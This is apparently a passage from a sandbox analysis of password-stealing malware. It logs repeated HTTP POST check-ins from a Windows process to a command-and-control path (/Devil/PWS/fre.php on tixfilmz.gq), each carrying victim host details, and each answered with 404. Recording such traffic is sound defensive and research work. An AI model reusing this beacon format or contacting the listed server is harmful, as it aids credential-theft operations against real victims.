Aug 11, 2022 06:42:15.052087069 CEST	1030	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:15.069155931 CEST	1030	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:15.165085077 CEST	1031	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7ABObsXbQcHdnhtJPI8XreO6Qwq10iYwVNciyewQ4rLsb7Pcx09BNdkyXLXs9ydJd52ebLqkg3Ye7uOK2DeXYCKDW1duAcls9jdV3KDrYwI1Ddm7lqJGDb603ptNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4db41affbbf7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49762	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:35.961536884 CEST	1064	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:35.978749990 CEST	1064	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:36.063500881 CEST	1065	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BDDcJA9loNSYiH0%2BzGFmVbKmzSb%2Ff5hpB1MM20uTsti37mQygz7a4phBDXPmpiRJpWyppkWO1aCufCSBc61S3fu9WYSM8a3mgQ9baO8%2FIg4rJNzKepSDyKU5TN5C7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e36c9bb5c50-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49763	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:39.324990988 CEST	1066	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:39.341988087 CEST	1066	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:39.416142941 CEST	1067	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NEMPzCv%2BglpdrXSrBrz41omROycORcGwZRT8uzlQMUlk9El6ItPaLC0Fo6hrzsBTBR%2Bgbawx8OEpKTh5mEACiFWQH3CR3z30oVs%2BC%2FSx0oRn4PnrWKdRHDRuREQvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e4bcaa1bbf5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49764	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:41.209816933 CEST	1067	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:41.226878881 CEST	1068	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:41.306250095 CEST	1068	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUYSQmDNLM25L3Xc5iUuFUSvf59cAHIJ%2FyW%2FdECVdBBKZeP7djubS9URGb%2B504ohSvLJdBV5cJr%2BQkwAyXFP0K6zoiBUy0%2BSXhh%2BWUAlw%2B7PQuD8mVJaui9lgSztuw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e579eecbb85-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49766	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:42.773950100 CEST	1081	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:42.792331934 CEST	1081	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:42.869123936 CEST	1094	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E7vSqzyZk3qIwXx9eUocaI9hXGtrWZPhFgRL0EBT5ZsuSpNKLZmWOC1rHM36XQm4Si%2FsrLKJFtM4XlTXuHulsyaWTJ9knN%2BaJT8klsOGYIdLAk0HH3jyCnb6Mgt4aQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e615e119bb3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49774	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:44.099149942 CEST	1187	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:44.116035938 CEST	1188	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:44.189769983 CEST	1204	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S4oxOBWv%2B4UOVMwb0kDScW1nQwQrd5EacUvdKMaUqDq9Z1JWbQ1YF%2FYBVr7gB1AuQpiog2uSyIguk96hVrenhW0UVTED95Y8lUk9jln%2FKYpiuz5llJWMVaTU2P9upQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e69acc4bb86-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49777	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:45.276947975 CEST	1234	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:45.294847012 CEST	1234	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:45.373523951 CEST	1235	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CTFZF%2BWEcf%2FZ3ve0OTQGqdgiQcRFWglSF2ioHkR1%2B1Dt8yFUGv%2FbQkYy3SgYWtYfRTt%2Fu1iWEP2lKl5AFOepBLjGhytA9dH7hUwySrO%2FraUqHxKumZ8Zds8T3nsBFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e710fd8926d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49778	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:46.945645094 CEST	1236	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:46.962881088 CEST	1236	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:47.043102980 CEST	1237	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE5YLOzAxfxUnOqS9Yf%2Fh%2FyGk7n8MwLfQafrSeANUvgLxd5QwzD7KKvTWDJjn0hBBTMgo0iyw9pagijUx6QdFa01qDWZr6PsnY4%2BoTD0nvKrpk2M20K6fr86jy04vw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e7b6f759b95-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49780	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:49.154690027 CEST	1238	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:49.172816992 CEST	1238	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:49.279305935 CEST	1239	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x4NOgxjp5bamSb5%2BEGCU0lIDm14biGjteevVZ1anxZu4L0uIwVi%2F4E6I8kDhwGQjgjRvJ0SlP3vpL9jSfqjTJGOkNcR57X%2FhUTbcaZ3QMoTrnypJ%2B1ZRujwexFap4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e893a77bc01-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49782	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:50.570997000 CEST	1240	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:50.588017941 CEST	1240	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:50.665591955 CEST	1241	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R8wPA8bakoFeAux%2BPghUTfYdyrLQJAPleFgfZf1TztZzoaXyuxTpp%2BY3m%2BZn8tBonTuOV6rdaOFSE7zkck%2FyMJ1y6CBC5ezSeohSLmU73ysrJ1IDe9iQzJ1%2BSFTulg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e921cecbb32-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49785	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:51.879415035 CEST	1251	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:51.896985054 CEST	1251	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:51.983930111 CEST	1252	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0in6Ayj8I3zO6NO1iFxs%2Bdf30Iekyj2pJivQsyFDdGqf%2Fdfsg4DG5bw119gvvuAAXzm1JIN5aN1ROwd%2BBLhLBUlg7X7WLzIMXsz6zOalbMhpxzCC9JW6xboqYwa3lg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4e9a4dd19b57-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49745	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:16.160936117 CEST	1032	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:16.177916050 CEST	1032	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:16.296185017 CEST	1033	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgEHyzNGG3wTlvIqrFT9Qg9CyoJJco9av7NNGpAxa4Lv150iQghRp9kjVuXQ7MMVm025fTNlO4GAiU0JtozkA90G4dr6yvHcKVA0lMkDoG%2BgwlguHut59hkTKxPVSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dbb0f449bbc-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49786	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:53.219319105 CEST	1253	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:53.236259937 CEST	1253	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:53.353355885 CEST	1264	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgNEJXZGOHn5Egc%2FCUfGGyJgE0wCr2whFXS4CpUoV5rbFo71CqRWstxCdJot%2BnpztUTC6k4pFu4PcMAf8lGER02%2FUesG3wyV3uvFGhNzYS2f3WfRSY%2F07O3swpFd5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ea2af54bba9-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49788	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:54.331478119 CEST	1265	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:54.348571062 CEST	1265	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:54.430865049 CEST	1266	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oz58tFC9j%2F%2FUWYTDA2KIPUhsEEJLq3Fj%2F%2FNjwIxsOu3JbAS5a4UeBpXda4G3IGkrnybQ309H0O4WVRE4wWmTnDnp5%2BTOCGJvzW5H1baNzJblY%2BgusnlFAaq0GMzbVQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4ea9998f915e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49789	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:55.412962914 CEST	1266	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:55.430126905 CEST	1267	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
